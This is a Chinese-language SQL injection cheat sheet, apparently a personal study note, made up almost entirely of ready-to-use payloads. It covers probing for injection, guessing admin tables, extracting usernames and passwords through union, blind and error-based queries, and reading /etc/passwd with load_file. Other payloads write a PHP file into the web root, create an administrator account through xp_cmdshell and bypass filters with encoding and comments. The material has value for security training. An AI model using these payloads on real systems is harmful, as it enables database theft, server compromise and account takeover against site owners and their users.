手工注入语句总结
0x00,判断有没有漏洞:
12-0
12-1
and 1=1
and 1=2
or 1=1
or 1=2
xor 1=1
xor 1=2
; and 1=1 and 1=2
and '1'='1'
and 1 = 1
%’and 1=1 and ’%’=’
(1)anandd(1=1)
%df
0x01,常见的表名列名:
常用的表名:
admin user news manage a_admin x_admin m_admin adminuser
admin_user article_admin administrator manager member
memberlist users Manage_User user_info admin_userinfo login new news
常用的列名:
username password id adminusername admin_username adminname
admin_name admin adminuser admin_user user_name user_admin
administrator administrators adminpassword admin_pwd
adminpass userpass user_pass admin_passwod
0x02,Access偏移注入:(工具猜不出来列)
地址后面加上单引号’,服务器会返回下面的错误提示:
Microsoft JET Database Engine 错误 '80040e14'
网站使用的是Access数据库,通过JET引擎连接数据库
关键字 and 1=1
关键字 and 1=2
将and 1=1 换成注入语句就可以注入了。
and 1=1
and 1=2
order by 7--+
order by 8--+
union select 1,2,3,4,5,6,7--+
union select 1,2,3,4,5,6,7 from admin--+
union select 1,2,3,4,5,* from admin --+尝试admin表有几个字段
union select 1,2,3,4,5,6,* from admin--+
union select 1,2,id,4,5,6* from admin--+尝试id属于第几个字段
union select 1,id,3,4,5,6* from admin--+
union select 1,2,* from (admin as a inner join admin as b on a.id=b.id)(这个时候就获得了用户名和密码)
同时呢,我们可以找后台,F12查看源代码,查看列名
union select 1,2,A_name,Apwd,5,6,7 from admin–+
and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
id=49 And (Select Count(*) from Admin)>=0#猜admin表
id=49 and exists (select * from admin)
and 1=(select count(*) from admin where len(name)>6)#错误,猜取字段的长度
and 1=(select count(*) from admin where len(name)>5)#正确 长度是6
id=49 and (select top 1 len(username) from Admin)>0#>1,>2。。判断列的长度为3
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)=114#猜解列名第1个字符,
id=49 and (select top 1 asc(mid(username,2,1)) from Admin)=67#猜解列名第2个字符,
id=49 and (select top 1 asc(mid(username,3,1)) from Admin)=78#猜解列名第3个字符,
id=49 and (select top 1 asc(mid(password,3,1)) from Admin)=78
0x03,mysql注入:
关键字 and 1=1
关键字 and 1=2
将and 1=1 换成注入语句就可以注入了。
猜字段数
order by n/*
查看报错字段
union select 1,2,3,4,5--+
查看mysql基本信息
and 1=2 union select username from users where id=1 union select concat(user(),',',database(),',',version())
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
查询数据库
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
查询表名
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库的16进制编码/*
and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表
and 1=2 union select table_name from information_schema.tables where table_schema='bloodzer0' limit 0,1;
查询字段
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码/*
and 1=2 union select table_name from information_schema.tables where table_schema=(select database()) limit 0,1
and 1=2 union select column_name from information_schema.columns where table_name='users' limit 0,1 #查询列
查询数据
and 1=2 union select 1,2,3,字段1,5,字段2,7,8 from 数据库.表/*
and 1=2 union select id,username from users union select 1,2 #mysql执行:语句正常;mssql执行:语句错误,数据类型不匹配,无法正常执行
and 1=2 union select id,username from users union select 1,2 from dual #oracle执行:语句错误,数据类型不匹配
判断是否具有读写权限
and (select count(*) from mysql.user)>0/*
and (select count(file_priv) from mysql.user)>0/*
如果有权限,进行load_file()读取文件:
and 1=2 union select * from users union select 1,load_file('/etc/passwd'),3/*(错误写法)
and 1=2 union select * from users union select 1,load_file(0x2F6574632F706173737764),3 #使用16进制绕过单引号限制
and 1=2 union select * from users union select 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3
and 1=2 union select * from users union select 1,hex(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),3
如果有权限,进行into outfile()写入文件:
and 1=2 union select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php'(错误写法)
and 1=2 union select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php'
如果你有sa权限,sqlserver服务器:
id=1;exec master..xp_cmdshell “net user name password /add”--
id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
如果你有sa权限:
数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来
?id=1;backup database 数据库名 to disk=’c:1.db’;--
使用ascii
AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
使用正则表达式
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)
使用string()
and (select 1)=1 正常显示,则substring可以正常使用
and (select substring(@@version,1,1))=4,判断版本
and (select 1 from users limit 0,1)=1,判断user()表
and (select substring(concat(1,password),1,1) from users limit 0,1)=1
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
0x04,利用的函数报错注入:
?id=12-0
?id=12-1
/*数据库版本*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*简单办法暴库*/
.php?id=info()
/*连接用户*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字段*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴内容*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
?id=12-0
?id=12-1
id=12 order by 5
id=12 order by 6
id=a()#爆出数据库名
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ user()),0x7e),1)#爆出数据库名称
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/schema_name /*!%0afrom*/ information_schema.schemata LIMIT 1,1),0x7e),1)#爆库
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/table_name /*!%0afrom*/ information_schema./*!%0ctables*/ where table_schema=0x696C756D696E61635F706F7274616C LIMIT 9,1),0x7e),1)#爆表
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/column_name /*!%0afrom*/ information_schema.columns where table_name='users' LIMIT 0,1),0x7e),1)#爆字段
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*//*!%0aconcat*/(username,0x3a,password) from users limit 0,1),0x7e),1)#爆用户名密码
0x05,搜索型注入:
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以注入了。
比如:%'and(select count(*)from admin)>0 and '%'='%
0x06,cookie注入:
javascript:alert(document.cookie="id="+escape("44 and 1=1"));
javascript:alert(document.cookie="id="+escape("44 and 1=2"));
将and 1=1 换成注入语句就可以注入了。
0x07,宽字节注入:
id=1%d5 and 1=1
id=1%df and 1=2
将and 1=1 换成注入语句就可以注入了。
0x08,盲注:
不同的场景,形式不同。
错误的地方,可以发邮件告诉我,大家相互学习。后期会继续补充的。
详细可见:Mysql注入总结